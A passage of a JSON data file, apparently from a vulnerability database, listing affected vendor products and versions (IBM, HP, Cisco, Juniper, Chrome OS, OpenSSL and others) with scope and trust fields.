}, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.3" }, { "model": "infosphere master data management provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "one-x communicator for mac os", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "x1.0.5" }, { "model": "laserjet m5035 multifunction printer q7829a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.306.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.38" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3200" }, { "model": "s2750\u0026s5700\u0026s6700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "8.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.5.2.3" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "1.6.1" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "laserjet enterprise m602 series ce992a 2302963 436082", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "600" }, { "model": "fortiwifi", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.0.8" }, { "model": "laserjet enterprise m712 series cf238a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7000" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.4" }, { "model": "junos 12.1r8-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network intrusion prevention system gx5208-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.344" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087220" }, { "model": "9.2-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "content analysis system software", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "1.1.5.5" }, { "model": "fortimail", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.5" }, { "model": "junos 12.1x46-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "sparc enterprise m9000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.14" }, { "model": "advanced settings utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "websphere datapower xml accelerator xa35", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.7" }, { "model": "(comware family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12500v7)0" }, { "model": "automation stratix", "scope": "ne", "trust": 0.3, "vendor": "rockwell", "version": "590015.6.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.11" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.50" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v5000-" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.72" }, { "model": "nexus series fabric extenders", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "20000" }, { "model": "intelligencecenter", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.2" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "strm 2012.1r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.0" }, { "model": "financial services lending and leasing", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "14.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.2" }, { "model": "fortimail build", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "4.3.8546" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.55" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "documentum content server p02", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "player", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "9.0.3" }, { "model": "sbr global enterprise", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "color laserjet printer series q7533a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "300046.80.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.10" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.19" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "power ps700", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "bcaaa", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.5" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "winscp", "scope": "eq", "trust": 0.3, "vendor": "winscp", "version": "5.1.7" }, { "model": "communicator for android", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "laserjet enterprise m712 series cf235a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7000" }, { "model": "color laserjet cp5525 ce708a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.12" }, { "model": "desktop collaboration experience dx650", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura application server sip core pb28", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "oncommand workflow automation", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "automation stratix", "scope": "eq", "trust": 0.3, "vendor": "rockwell", "version": "59000" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "communicator for android", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0.2" }, { "model": "client applications", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.48" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "content analysis system software", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1.5.2" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.41" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.63" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.9" }, { "model": "secure analytics 2014.2r2", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "color laserjet cm4540 mfp cc421a 2302963 436067", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "color laserjet cp6015 q3934a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.203.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.5" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.21" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.6" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.24" }, { "model": "telepresence ip gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ape", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "2.0" }, { "model": "junos 12.1r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "p2000 g3 msa array system ts251p005", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "idol software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.8" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.1" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0" }, { "model": "open systems snapvault 3.0.1p6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "key", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.2" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.5" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.14" }, { "model": "laserjet p4515 cb515a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.213.1" }, { "model": "worklight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "tivoli netcool/system service monitor fp13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "laserjet enterprise color m775 series cc523a 2302963 436079", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "700" }, { "model": "9.3-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.01" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.11" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.1" }, { "model": "power 780", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "watson explorer security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "52056340" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.53" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7700" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.4" }, { "model": "junos 12.2r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.7" }, { "model": "u200s and cs family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "client applications", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "security threat response manager 2013.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.71" }, { "model": "pulse desktop 5.0r4.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.0" }, { "model": "vdi-in-a-box", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.3.2" }, { "model": "vdi-in-a-box", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.3.7" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.1" }, { "model": "winscp", "scope": "ne", "trust": 0.3, "vendor": "winscp", "version": "5.5.4" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.04" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.3" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "enterprise session border controller ecz7.3m2p2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "integrated management module ii", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.02" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.6" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "laserjet m3035 multifunction printer cc476a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "hsr6800 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1" }, { "model": "management center", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.3" }, { "model": "color laserjet m651 cz258a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "switch series (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10500v5)0" }, { "model": "ddos secure", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "5.14.1-1" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "3.4.1" }, { "model": "9.3-beta1-p2", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.2" }, { "model": "vsm v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "junos 12.2r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "message networking sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "officejet enterprise color mfp b5l05a 2302963 436066", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "x585" }, { "model": "color laserjet cm4540 mfp cc420a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "dgs-1210-52", "scope": "eq", "trust": 0.3, "vendor": "d link", "version": "4.00.025" }, { "model": "ngfw family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "powervu d9190 comditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "integrated management module ii", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.31" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.57" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.3" }, { "model": "msr9xx russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "junos 12.3r4-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.14" }, { "model": "ssl vpn", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.0" }, { "model": "10.0-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "1.9.3" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1.1" }, { "model": "ive os 7.4r11.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system p260", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)0" }, { "model": "laserjet enterprise m806 cz244a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "usage meter", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.3" }, { "model": "data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "6.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.73" }, { "model": "security network intrusion prevention system gx5008", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "softco v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "proxyav", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "3.4.2.7" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.3" }, { "model": "s2700\u0026s3700 v100r006c05+v100r06h", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.56" }, { "model": "horizon mirage edge gateway", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.4.2" }, { "model": "oceanstor s6800t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "virtuozzo containers for windows", "scope": "eq", "trust": 0.3, "vendor": "parallels", "version": "4.6" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "junos 12.1x44-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "color laserjet cm4730 multifunction printer cb480a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.54" }, { "model": "sbr enterprise", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "laserjet enterprise p3015 ce527a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "telepresence mcu series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flex system fabric cn4093 10gb converged scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.8" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.014" }, { "model": "asg2000 v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.154" }, { "model": "idp 5.1r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network intrusion prevention system gx4004", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network intrusion prevention system gv1000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "nac manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "splunk", "scope": "ne", "trust": 0.3, "vendor": "splunk", "version": "6.0.4" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "smc2.0 v100r002c01b017sp17", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.6" }, { "model": "laserjet cm3530 multifunction printer cc519a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "53.236.1" }, { "model": "laserjet pro color mfp m276n/nw cf144a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "20020140919" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58000" }, { "model": "color laserjet cm4730 multifunction printer cb481a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "email appliance", "scope": "eq", "trust": 0.3, "vendor": "sophos", "version": "3.7.0.0" }, { "model": "email security gateway", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.8.3" }, { "model": "junos os 12.1x46-d20", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "player", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "10.0.2" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.0.10" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.43" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.13" }, { "model": "junos 12.2r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "one-x communicator for mac os", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "x1.0.4" }, { "model": "network connect 7.4r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "msa storage gl200r007", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1040" }, { "model": "winscp", "scope": "eq", "trust": 0.3, "vendor": "winscp", "version": "5.1.4" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.10" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "rox", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "11.16.1" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "usg2000 v300r001c10sph201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "laserjet p4014 cb506a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.0" }, { "model": "arubaos", "scope": "ne", "trust": 0.3, "vendor": "arubanetworks", "version": "6.3.1.8" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.6" }, { "model": "system x3500m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73801.42" }, { "model": "licensing", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "ive os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.0" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325025830" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.53" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "fortimail", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.1.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "switch series (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10500v7)0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.6" }, { "model": "idol image server", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "10.7" }, { "model": "ecns600 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u19** v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sbr carrier", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.5" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloudplatform", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "4.2.1-x" }, { "model": "watson explorer security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "laserjet enterprise color m551 series cf081a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5000" }, { "model": "netscaler", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "9.0" }, { "model": "universal small cell series software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.20" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.2" }, { "model": "oceanstor s5600t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "9.0--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "laserjet enterprise color m855 a2w78a 2302963 436076", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "800" }, { "model": "one-x communicator for mac os", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "x1.0.2" }, { "model": "color laserjet printer series q5984a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "380046.80.8" }, { "model": "simatic cp1543-1", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "1.1" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "52056330" }, { "model": "color laserjet cp5525 ce707a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "9.0-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system dx360m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73231.42" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "psb email and server security", 